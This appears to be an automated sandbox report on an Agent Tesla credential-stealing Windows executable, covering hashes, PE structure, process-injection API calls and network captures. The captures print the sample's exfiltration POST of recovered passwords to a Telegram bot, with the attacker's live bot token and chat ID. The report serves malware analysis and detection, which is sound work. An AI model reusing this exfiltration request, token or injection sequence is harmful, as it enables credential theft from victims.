                                                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.864829670852181
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:Smh3IA9098.exe
                                                                                            File size:745984
                                                                                            MD5:9b75823d12157891fafe183679b54831
                                                                                            SHA1:1e074aab3a27aebdefa87f520350109c95b31cf4
                                                                                            SHA256:306a4b507ed783c41a906281904642730d4887aac6dcd5d3ee7ba066d0a51efa
                                                                                            SHA512:963331bc8f3da1acb9054bed209418ec6f08158ceffef04fda67b98a28e42a0908b8481d74100c5f1de329f490866821ca0bd4362539a388280355358bb25347
                                                                                            SSDEEP:12288:pr9mYMUnFW/NWTzHRYHjwvgRizNIezQMTO3HeX74zfgxYb+ttNNTY+CE5kgesGI:pr9UUvxgj6gQzNIOLc+sDx2jNTt8
                                                                                            TLSH:5AF402646BA79128F93753BDA6E532814B7E67632713C95D04F211CE0B23B428FD1A3B
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0..L...........k... ........@.. ....................................@................................
                                                                                            Icon Hash:209480e66eb84902
                                                                                            Entrypoint:0x4b6b82
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6417B8A5 [Mon Mar 20 01:36:37 2023 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb6b2d0x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x1110.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb57180x54.text
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000xb4b880xb4c00False0.9270590205739973data7.873571070736306IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xb80000x11100x1200False0.73046875data6.631938259113971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xba0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0xb81000xa79PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                            RT_GROUP_ICON0xb8b8c0x14data
                                                                                            RT_VERSION0xb8bb00x360data
                                                                                            RT_MANIFEST0xb8f200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-18:29:57.946141 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 18:29:44.434194088 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:44.434241056 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:44.434357882 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:44.462390900 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:44.462405920 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:45.065954924 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:45.066037893 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:45.093189001 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:45.093211889 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:45.093696117 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:45.139694929 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:45.335325003 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:45.335367918 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:46.803993940 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:46.851273060 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:46.976540089 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:46.976711988 CET | 443 | 49707 | 64.185.227.155 | 192.168.2.6
Mar 20, 2023 18:29:46.976937056 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:46.977456093 CET | 49707 | 443 | 192.168.2.6 | 64.185.227.155
Mar 20, 2023 18:29:57.801019907 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Mar 20, 2023 18:29:57.801071882 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:57.801156998 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Mar 20, 2023 18:29:57.801922083 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Mar 20, 2023 18:29:57.801939964 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:57.875756979 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:57.875921011 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Mar 20, 2023 18:29:57.882587910 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Mar 20, 2023 18:29:57.882610083 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:57.882960081 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:57.885320902 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Mar 20, 2023 18:29:57.885354996 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:57.927625895 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:57.945914030 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Mar 20, 2023 18:29:57.945959091 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:58.040643930 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:58.040755987 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.6
Mar 20, 2023 18:29:58.040847063 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Mar 20, 2023 18:29:58.041444063 CET | 49708 | 443 | 192.168.2.6 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 18:29:44.350991011 CET | 58595 | 53 | 192.168.2.6 | 8.8.8.8
Mar 20, 2023 18:29:44.371252060 CET | 53 | 58595 | 8.8.8.8 | 192.168.2.6
Mar 20, 2023 18:29:44.389094114 CET | 56331 | 53 | 192.168.2.6 | 8.8.8.8
Mar 20, 2023 18:29:44.408740997 CET | 53 | 56331 | 8.8.8.8 | 192.168.2.6
Mar 20, 2023 18:29:57.782294989 CET | 50506 | 53 | 192.168.2.6 | 8.8.8.8
Mar 20, 2023 18:29:57.799567938 CET | 53 | 50506 | 8.8.8.8 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 18:29:44.350991011 CET | 192.168.2.6 | 8.8.8.8 | 0x3f2 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:29:44.389094114 CET | 192.168.2.6 | 8.8.8.8 | 0xb099 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:29:57.782294989 CET | 192.168.2.6 | 8.8.8.8 | 0x5711 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 18:29:44.371252060 CET | 8.8.8.8 | 192.168.2.6 | 0x3f2 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:29:44.371252060 CET | 8.8.8.8 | 192.168.2.6 | 0x3f2 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:29:44.371252060 CET | 8.8.8.8 | 192.168.2.6 | 0x3f2 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:29:44.371252060 CET | 8.8.8.8 | 192.168.2.6 | 0x3f2 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:29:44.408740997 CET | 8.8.8.8 | 192.168.2.6 | 0xb099 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:29:44.408740997 CET | 8.8.8.8 | 192.168.2.6 | 0xb099 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:29:44.408740997 CET | 8.8.8.8 | 192.168.2.6 | 0xb099 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:29:44.408740997 CET | 8.8.8.8 | 192.168.2.6 | 0xb099 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:29:57.799567938 CET | 8.8.8.8 | 192.168.2.6 | 0x5711 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                            • api.ipify.org
                                                                                            • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49707 | 64.185.227.155 | 443 | C:\Users\user\Desktop\Smh3IA9098.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:29:45 UTC | 0 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2023-03-20 17:29:46 UTC | 0 | IN | HTTP/1.1 200 OK
    Content-Length: 14
    Content-Type: text/plain
    Date: Mon, 20 Mar 2023 17:29:46 GMT
    Vary: Origin
    Connection: close
2023-03-20 17:29:46 UTC | 0 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
    Data Ascii: 102.129.143.78


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49708 | 149.154.167.220 | 443 | C:\Users\user\Desktop\Smh3IA9098.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:29:57 UTC | 0 | OUT | POST /bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8db29711b5da886
    Host: api.telegram.org
    Content-Length: 981
    Expect: 100-continue
    Connection: Keep-Alive
2023-03-20 17:29:57 UTC | 0 | IN | HTTP/1.1 100 Continue
2023-03-20 17:29:57 UTC | 0 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 31 62 35 64 61 38 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 37 33 37 36 33 38 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 31 62 35 64 61 38 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 31 38 3a 32 39 3a 35 36 0a 55 73 65 72
    Data Ascii: -----------------------------8db29711b5da886Content-Disposition: form-data; name="chat_id"5737638148-----------------------------8db29711b5da886Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 18:29:56User
2023-03-20 17:29:58 UTC | 1 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 20 Mar 2023 17:29:58 GMT
    Content-Type: application/json
    Content-Length: 730
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":1237,"from":{"id":5806691582,"is_bot":true,"first_name":"chezieee","username":"chiezieebot"},"chat":{"id":5737638148,"first_name":"Texas","last_name":"Off","type":"private"},"date":1679333397,"document":{"file_name":"user-648351 2023-03-20 18-29-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIE1WQYmBVT1P_M1pZqLVG40f5Xbtd0AAJ3DAACeCjIUOHWdj6yZrvqLwQ","file_unique_id":"AgADdwwAAngoyFA","file_size":352},"caption":"New PW Recovered!\n\nTime: 03/20/2023 18:29:56\nUser Name: user/648351\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":181,"length":14,"type":"url"}]}}


                                                                                            Target ID:0
                                                                                            Start time:18:29:32
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            Imagebase:0xfe0000
                                                                                            File size:745984 bytes
                                                                                            MD5 hash:9B75823D12157891FAFE183679B54831
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:low

                                                                                            Target ID:1
                                                                                            Start time:18:29:41
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            Imagebase:0x6d0000
                                                                                            File size:745984 bytes
                                                                                            MD5 hash:9B75823D12157891FAFE183679B54831
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low


                                                                                              Execution Graph

                                                                                              Execution Coverage:9.9%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:86
                                                                                              Total number of Limit Nodes:3
[Execution graph: the rendered graph is not preserved. API-call nodes recovered from the graph dump, by address: 7928bdb ReadProcessMemory; 79289c0 VirtualAllocEx; 7928ab8 WriteProcessMemory; 79287dd SetThreadContext; 7928f76 CreateProcessA; 79286f8 ResumeThread; 59c0a40 CreateWindowExW; 59c302a CallWindowProcW; 59c0c18 and 59c0c20 SetWindowLongW; 7db9580 PostMessageW. The CreateProcessA, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread nodes are the API sequence behind the "Injects a PE file into a foreign processes" signature listed above.]

Control-flow Graph

[Control-flow graph for the function at 7928d88 (basic blocks 7928d88 to 79290cc; CreateProcessA is called in block 7928f17-7928fd1). The rendered graph and its executed/not-executed colouring are not preserved.]
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07928FBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 4527d7d2e678824d6312018943205f94bd809a73120527d44b71d938dc105e66
                                                                                              • Instruction ID: 0e18e82524648e35a16d1ffeaf8de7f9e2a5d55bc83096310de61cdbae13d693
                                                                                              • Opcode Fuzzy Hash: 4527d7d2e678824d6312018943205f94bd809a73120527d44b71d938dc105e66
                                                                                              • Instruction Fuzzy Hash: 05916DB1D0022ADFDF10EFA9C841BEDBBB6BB44314F048569E809B7244DB749986DF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph for the function at 59c09cc (basic blocks 59c09cc to 59c0b49; CreateWindowExW is called in block 59c0a5b-59c0afa). The rendered graph and its executed/not-executed colouring are not preserved.]
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059C0AEA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: ac0d1e8ecc244d76d67560a1f02b1836b9c122bbf4f972b49223718316f40425
                                                                                              • Instruction ID: 1d1f5fd59a7736a487c1d076226fa2c1fd1dbfe62b57bc669591535f20fd611a
                                                                                              • Opcode Fuzzy Hash: ac0d1e8ecc244d76d67560a1f02b1836b9c122bbf4f972b49223718316f40425
                                                                                              • Instruction Fuzzy Hash: 1151BCB1D00309DFDF14CFAAC984ADEBBB5BF48314F24812AE819AB210D7749985CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 59c09d8-59c0b49, CreateWindowExW is called from block 59c0a5b-59c0afa]
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059C0AEA
Memory Dump Source
• Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 919580c79e2c071f5a1c5ad661b536e0c324c8b99d9c8b6ab3595acc0a4a52a8
• Instruction ID: d6558f1dd48a7f75115c88bbe9897027e02d6941ed59107f6d5987a2750be380
• Opcode Fuzzy Hash: 919580c79e2c071f5a1c5ad661b536e0c324c8b99d9c8b6ab3595acc0a4a52a8
• Instruction Fuzzy Hash: 5C418DB1D00209DFDF14CF9AD884ADEBFB5BF48314F24856AE819AB210D7749985CF91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 59c2f90-59c30ac, CallWindowProcW is called from block 59c302a-59c3062]
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 059C3051
Memory Dump Source
• Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 2bacfdeb750840e17f623ca96c75f73ba629f13f64875f62667a14a5020e721f
• Instruction ID: ef002f34fd9a58405e4c296b742bb3ebc17b23cd8307244da297ded9276cb52b
• Opcode Fuzzy Hash: 2bacfdeb750840e17f623ca96c75f73ba629f13f64875f62667a14a5020e721f
• Instruction Fuzzy Hash: EE410BB5900305DFCB14CF99C448AAABBF5FB88314F25C89DD519AB321D775A841CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 7928a70-7928b46, WriteProcessMemory is called from block 7928ace-7928b0d]
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07928B00
Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 2c33700c40b15533935ac47a9780bd53f51dff523946fb484c00debce7ac8cc6
• Instruction ID: 64b43f8a938073ec413f3334db8134c258bb718f6bc2dcbee74a5b52557ea581
• Opcode Fuzzy Hash: 2c33700c40b15533935ac47a9780bd53f51dff523946fb484c00debce7ac8cc6
• Instruction Fuzzy Hash: DF2126B19003199FCF10DFAAC884BEEBBF5FF48314F50842AE918A7241D7789944DBA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 7928b90-7928c56, ReadProcessMemory is called from block 7928b90-7928c1d]
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07928C10
Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 17877f494cc9b67453d02d612c32b59e18f9342559deb9fbb18bbfe37ed16753
• Instruction ID: eefa45e64e4c524d2b2ffb19222fde850390557b8f2b5ae88faccc693520e089
• Opcode Fuzzy Hash: 17877f494cc9b67453d02d612c32b59e18f9342559deb9fbb18bbfe37ed16753
• Instruction Fuzzy Hash: FD2116B18003199FCB10DFAAC880AEEBBF5FF48310F50842AE918A7250D7789944DBA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 7928798-792885c, SetThreadContext is called from block 79287f3-7928823]
APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 07928816
Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
• Opcode ID: b368551b4bf545ce424aa20e58baabee1e08c56fecef562813495442f8ef892e
• Instruction ID: 6e81a8b3e5da3601d098e1e3f3eb015f40f81f1d8e2761e2f792a932c8b9a7b8
• Opcode Fuzzy Hash: b368551b4bf545ce424aa20e58baabee1e08c56fecef562813495442f8ef892e
• Instruction Fuzzy Hash: 452137B1D002098FCB10DFAAC484BEEBBF5EB88324F54842AD419A7340DB789945CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 7928980-7928a29, VirtualAllocEx is called from block 7928980-79289fb]
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079289EE
Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: cfdba73179d52ea0794c2f64a935576d0dad6183b90739dbd7fe1a349d04d8ff
• Instruction ID: a04b06d3f814a74341ffee7c7e5a0583b0cdc0c11690bf4986633cac63ec576b
• Opcode Fuzzy Hash: cfdba73179d52ea0794c2f64a935576d0dad6183b90739dbd7fe1a349d04d8ff
• Instruction Fuzzy Hash: 6E11F9719002499FCF10DFAAC844ADFBFF5AB88324F148819E559A7250C7799544DFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 79286b8-7928755, ResumeThread is called from block 79286b8-7928727]
APIs
• ResumeThread (API name taken from the control-flow graph; the report lists no ref address for this function)
Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: fc65b7a8403dc35e3f6f77fe44b0149e8853bd072c5147630cda1144839c72d2
• Instruction ID: 79a712c3166750f3844558fe32ec7e4fb762aadc5548696e8a9e5174b4c5b726
• Opcode Fuzzy Hash: fc65b7a8403dc35e3f6f77fe44b0149e8853bd072c5147630cda1144839c72d2
• Instruction Fuzzy Hash: F311F8B1D002598BDB10EFAAC4447DEFBF9AB88324F148819D419B7340DB78A945CBA5
Uniqueness
